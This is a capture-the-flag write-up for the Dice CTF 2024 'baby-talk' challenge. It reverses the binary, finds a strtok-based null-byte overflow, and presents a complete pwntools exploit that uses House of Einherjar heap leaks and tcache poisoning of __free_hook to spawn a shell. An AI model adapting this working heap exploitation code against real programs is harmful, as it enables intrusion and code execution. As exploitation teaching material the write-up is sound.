baby-talk
was a pwn challenge from Dice CTF 2024. The challenge involves exploiting the heap with the House of Einherjar attack. Challenge files can be found here.
Initial Analysis
Before we begin, because this is a heap exploitation challenge we need to link the binary with the correct libc version. This can be done by copying the libc-2.27.so
and ld-2.27.so
from the docker container the challenge runs in (Dockerfile is provided to us). The challenge uses glibc 2.27
.
Checking the protections on the binary we see that everything is enabled.
1
2
3
4
5
6
7
root@ba2b05692079:/home/ctf# pwn checksec ./chall
[*] '/home/ctf/chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
When running the binary we are presented with four options:
1
2
3
4
5
6
7
root@ba2b05692079:/home/ctf# ./chall
1. str
2. tok
3. del
4. exit
>
We are not given the source code for the binary, so we have to reverse engineer it.
Reversing the binary
There are three functions in the binary which are interesting, do_str
, do_tok
, do_del
.
do_str
first finds an empty slot in the strs
array, which is a global array, with the get_empty
function. We can have a maximum of 16 allocations. Then it asks us for a size which it will allocate for, before reading in up to an equal amount of bytes into the malloced region. There is no lower-bound check on the size, because get_num
converts the input to an unsigned long.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
void do_str() {
unsigned int empty; // [rsp+4h] [rbp-Ch]
unsigned __int64 size; // [rsp+8h] [rbp-8h]
empty = get_empty();
if (empty == -1) {
puts("too many!");
}
else {
printf("size? ");
size = get_num();
if (size <= 0x1000) {
strs[empty] = malloc(size);
if (strs[empty]) {
printf("str? ");
read(0, (void *)strs[empty], size);
printf("stored at %d!\n", empty);
}
else {
puts("no mem!");
}
}
else {
puts("too big!");
}
}
}
do_tok
asks for an index and a delimiter, and calls strtok
on the string stored at the index, if any. The substrings are then printed out.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
void do_tok() {
char buf[2]; // [rsp+6h] [rbp-1Ah] BYREF
char *i; // [rsp+8h] [rbp-18h]
unsigned __int64 num; // [rsp+10h] [rbp-10h]
char *s; // [rsp+18h] [rbp-8h]
printf("idx? ");
num = get_num();
if ( num <= 0xF ) {
s = (char *)strs[num];
if (s) {
printf("delim? ");
read(0, buf, 2uLL);
buf[1] = 0;
for (i = strtok(s, buf); i; i = strtok(0LL, buf))
puts(i);
}
else {
puts("empty!");
}
}
else {
puts("too big!");
}
}
do_del
frees the memory at the index we specify, if there is a malloced chunk stored there. The pointer to the chunk is also nulled out, preventing any use-after-free vulnerabilities.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void do_del() {
unsigned __int64 num; // [rsp+0h] [rbp-10h]
void *ptr; // [rsp+8h] [rbp-8h]
printf("idx? ");
num = get_num();
if (num <= 0xF) {
ptr = (void *)strs[num];
if (ptr) {
free(ptr);
strs[num] = 0LL;
}
else {
puts("empty!");
}
}
else {
puts("too big!");
}
}
We create functions in our exploit script for each of the three actions we can take, which is the beginning of our exploit script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
exe = context.binary = ELF("./chall", checksec=False)
libc = exe.libc
io = process(exe.path)
def create(size, s):
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"size? ", str(size).encode())
io.sendafter(b"str? ", s)
io.recvuntil(b"stored at ")
return int(io.recvuntil(b"!")[:-1])
def tok(idx, delim):
io.sendlineafter(b"> ", b"2")
io.sendlineafter(b"idx? ", str(idx).encode())
io.sendlineafter(b"delim? ", delim)
def free(idx):
io.sendlineafter(b"> ", b"3")
io.sendlineafter(b"idx? ", str(idx).encode())
Vulnerability
The vulnerability in this program occurs in the do_tok
function. The strtok
function nulls out the delimiter when it occurs in the string, and stops if it encounters a null-byte in the string (because that indicates the end of the string). However, because our string is read in with read
function there is no null-byte terminating it, which makes strtok
go out of bounds (and start parsing other data which comes right after our string). We can perform a null-byte overflow with this to overwrite the prev-inuse
field of the proceeding chunk, which allows us to do House of Einherjar
to get a shell.
Heap Leak
We can get a heap leak from the tcache bin
. Chunks that are of size 0x408 or less are stored in the tcache when they are free’d, given that the there does not already exist 7 chunks of the same size as the one being free’d in the tcache. The tcache works as a linked list, which means that the chunks point to each other. If we allocate two chunks, and free them, we get a tcache looking like this: chunk b -> chunk a -> NULL
. The next chunk we allocate of the same size will give us chunk b
back again, now containing a pointer to chunk a
.
1
2
3
4
5
6
7
8
9
10
11
12
13
a = create(0x10, b"A")
b = create(0x10, b"B")
free(a)
free(b)
c = create(0x10, b"C") # This will give us chunk b back, with a pointer to chunk a
tok(c, b"D") # Read the heap pointer
heap_leak = unpack(io.recvline()[:-1].ljust(8, b"\x00"))
heap_base = heap_leak - 0x643
log.success(f"Heap base @ {hex(heap_base)}")
create(0x10, b"E") # Empty the tcache to ease further exploitation
Libc Leak
A libc leak is not necessary to do House of Einherjar, but for this challenge we need it to get the address of __free_hook
and system
so that we can get a shell.
One way to leak a libc address is through reading the contents of a free’d chunk located in the unsorted bin
. To get a chunk into the unsorted bin we need its size to be greater than 0x408, and then free it. However, we should also allocate a guard chunk before we free the large chunk, because if there is no allocated chunks between our large chunk and the top chunk, the large chunk will consolidate with the top chunk instead of going into the unsorted bin
.
1
2
3
4
5
6
7
8
9
10
11
12
a = create(0x420, b"A")
b = create(0x10, b"guard chunk")
free(a) # Goes into unsorted bin
create(0x420, b"D") # Allocate the chunk again from the unsorted bin, now containing a libc pointer
tok(a, b"A") # Read the pointer
libc_leak = unpack(io.recvline()[:-1].ljust(8, b"\x00"))
libc.address = libc_leak - 0x3ebc44
log.success(f"Libc base @ {hex(libc.address)}")
create(0x10, b"E") # Empty the tcache to ease further exploitation
Exploiting with House of Einherjar
Knowing that we have a null-byte overwrite and a heap leak, combined with a libc leak, we have all the prerequisites to perform the House of Einherjar attack and get a shell.
The attack starts off by creating a fake chunk on the heap. The size we set for this chunk can vary depending on how much memory is between this fake chunk and a large chunk we will null-byte overwrite into. In this case we will set this chunk to a size of 0x50. We choose this particular size because we use 8 bytes for our fake chunk’s header, as well as 0x20 bytes for bypassing security checks. Then there is 8 bytes of additional data for our fake chunk for alignment, before a minimum sized chunk of size 0x20, which we will use to perform the null-byte overwrite. Lastly, we have 8 bytes belonging to the large chunk we null-byte overwrite into, which covers the prev-size
field of this chunk.
1
2
3
4
5
6
7
8
9
# Fake chunk will be 0x6f0 bytes from the heap base
fake_chunk_addr = heap_base + 0x6f0
fake_chunk = pack(0) + pack(0x51)
fake_chunk += pack(fake_chunk_addr) * 2 # Bypass unlink security checks
a = create(0x38, fake_chunk)
c = create(0x18, b"B"*0x18) # Chunk to perform the null-byte overwrite from
d = create(0x4f8, b"C"*8) # Chunk which we will overwrite "prev-inuse" bit for
e = create(0x18, b"guard chunk") # Prevent consolidation with top chunk
Our fake chunk will look like this (blue color):
and the heap with all the allocations just mentioned will look like this (guard chunk is not included in the image):
The following things should be noted from the image of the heap layout:
- Our fake chunk needs 0x20 bytes of data to bypass security checks. To pass the unlink checks, which are done when we free the large chunk later for backwards-consolidation, we should have the first 0x10 bytes of our fake chunk to point to the address of itself, or else we will get a corrupted double-linked list error. The next 0x10 bytes should according to how2heap contain the size of the chunks that the first 0x10 bytes point to (which is our fake chunk). However, it does not seem like this check is performed in our case, so we can put anything here.
- The chunk between the large chunk and the fake chunk is used to perform the null-byte overwrite, and to set the
prev-size
field of the large chunk. Additionally, this chunk will be used more later because of it being overlapped by the consolidated chunk. - The large chunk should ideally have a least significant byte which is 0, so that we only overwrite the
prev-inuse
bit when we do the null-byte overwrite. We allocate 0x4f8 bytes to get the chunk to be 0x500 bytes in size. This is not a requirement however, as we just need the consolidation to happen so that we get overlapping chunks. We also place a guard chunk after this large chunk to prevent consolidation with the top chunk, similar to when we did the libc leak.
Now that our heap is setup correctly we can overwrite the prev-inuse
bit of the large chunk, by tokenizing the chunk before it with the \x01
delimiter. This will make the 0x501
chunk header turn to 0x500
, because the \x01
byte does not exist within this chunk, and strtok
will write out-of-bounds of this chunk and into the chunk header of the large chunk. By setting the prev-insue
bit to 0 it is now indicating that the chunk before it is free.
1
2
# Null byte overwrite the size: 0x501 -> 0x500
tok(c, b"\x01")
The relevant parts of the heap now look like this:
Heap layout after the null-byte overwrite
We now need to set the prev-size
field for the 0x500
chunk, so we free the chunk before it, so that it occurrs in the tcache, and then allocate the same size again to get the same chunk back. We can then fill this chunk with data, and set the last 8 bytes (which is just before the chunk header with 0x500) to 0x50 so that it will consolidate backwards with all of our fake chunk.
1
2
3
free(c)
# Set previous chunk size to 0x50 to consolidate backwards with our fake chunk
c = create(0x18, b"A"*0x10 + pack(0x50))
Now we can free the large chunk to make it consolidate backwards with our fake chunk, giving us an even larger chunk in the unsorted bin. However, we also want to free the c chunk (our small chunk) before we free the large chunk, because then this chunk will exist in both the unsorted bin (overlapped by the larger chunk) and the tcache (the advantage of this will be revealed shortly)!
1
2
free(c) # Let c be in both tcache and overlapped in unsortedbins
free(d) # Consolidate backwards with fake chunk into unsortedbins
The consolidated chunk have a size of 0x550, which we will allocate again. The reason we do this is because we now have the memory area of the c chunk (the small chunk before the large chunk earlier) both in the tcache and within our newly allocated 0x550 chunk.
Since the c chunk is both inside this 0x550 chunk and the tcache, we can overwrite the next pointer of the c chunk to point to __free_hook
. We can then allocate a minimum sized chunk, which will give us the address of the c chunk, and if we allocate a chunk of the same size again, we will get the address of __free_hook
returned by malloc! This means that the next time free
is called, we can make the program call system
instead, because we can overwrite __free_hook
with the address of system
.
But only calling system()
does not help us in any way, we want to call system("/bin/sh")
. Luckily, if we have a heap chunk which contains the string "/bin/sh"
we can just free that one to call system("/bin/sh")
(because the argument to system is a pointer to the string, and not the actual string itself).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Allocate the consolidated chunk which overlaps with the tcache chunk "c"
create(0x548, b"A"*0x28 + pack(0x21) + pack(libc.sym.__free_hook))
# Allocate a chunk containing "/bin/sh", so that we can free it later to get a shell
binsh = create(0x10, b"/bin/sh\x00")
# Overwrite __free_hook with system
create(0x10, pack(libc.sym.system))
# Call free on the chunk containing "/bin/sh", which because of our overwrite will call system("/bin/sh")
free(binsh)
# Enjoy the shell!
io.interactive()
1
2
3
4
5
6
7
root@ba2b05692079:/home/ctf# python3 exploit.py
[+] Starting local process '/home/ctf/chall': pid 20
[+] Libc base @ 0x7f75fb415000
[+] Heap base @ 0x55a3d7e79000
[*] Switching to interactive mode
$ ls
Dockerfile chall exploit.py ld-2.27.so libc-2.27.so libc.so.6
Full exploit Script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
from pwn import *
exe = context.binary = ELF("./chall", checksec=False)
libc = exe.libc
io = process(exe.path)
def create(size, s):
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"size? ", str(size).encode())
io.sendafter(b"str? ", s)
io.recvuntil(b"stored at ")
return int(io.recvuntil(b"!")[:-1])
def tok(idx, delim):
io.sendlineafter(b"> ", b"2")
io.sendlineafter(b"idx? ", str(idx).encode())
io.sendlineafter(b"delim? ", delim)
def free(idx):
io.sendlineafter(b"> ", b"3")
io.sendlineafter(b"idx? ", str(idx).encode())
### Get libc leak through unsortedbin ###
a = create(0x420, b"A")
b = create(0x10, b"B")
free(a)
create(0x420, b"D")
tok(a, b"A")
libc_leak = unpack(io.recvline()[:-1].ljust(8, b"\x00"))
libc.address = libc_leak - 0x3ebc44
log.success(f"Libc base @ {hex(libc.address)}")
### Get heap leak ###
a = create(0x10, b"A")
b = create(0x10, b"B")
free(a)
free(b)
create(0x10, b"C")
tok(a, b"D")
heap_leak = unpack(io.recvline()[:-1].ljust(8, b"\x00"))
heap_base = heap_leak - 0x643
log.success(f"Heap base @ {hex(heap_base)}")
create(0x10, b"E") # Clean tcache to ease further exploitation
### House of Einherjar ###
fake_chunk_addr = heap_base + 0x6f0
fake_chunk = pack(0) + pack(0x51) # Fake chunk of size 0x50
fake_chunk += pack(fake_chunk_addr) * 2 # Make chunk point to itself to bypass unlink checks
a = create(0x38, fake_chunk) # Setup fake chunk
c = create(0x18, b"B"*0x18) # Chunk we will use for null-byte overflow
d = create(0x4f8, b"C"*8) # Chunk which will consolidate backwards with our fake chunk
e = create(0x18, b"guard chunk") # Guard chunk to prevent consolidation with top chunk
tok(c, b"\x01") # Null-byte overflow
free(c) # Free chunk so that we can set "prev size" field of large chunk
c = create(0x18, b"A"*0x10 + pack(0x50)) # Overwrite "prev size" field of large chunk
free(c) # Let c be in both tcache and overlapped in unsortedbins
free(d) # Consolidate backwards with fake chunk into unsortedbins
# Allocate the consolidated chunk which overlaps with the tcache chunk "c"
create(0x548, b"A"*0x28 + pack(0x21) + pack(libc.sym.__free_hook))
# Allocate a chunk containing "/bin/sh", so that we can free it later to get a shell
binsh = create(0x10, b"/bin/sh\x00")
# Overwrite __free_hook with system
create(0x10, pack(libc.sym.system))
# Call free on the chunk containing "/bin/sh", which because of our overwrite will call system("/bin/sh")
free(binsh)
# Enjoy the shell!
io.interactive()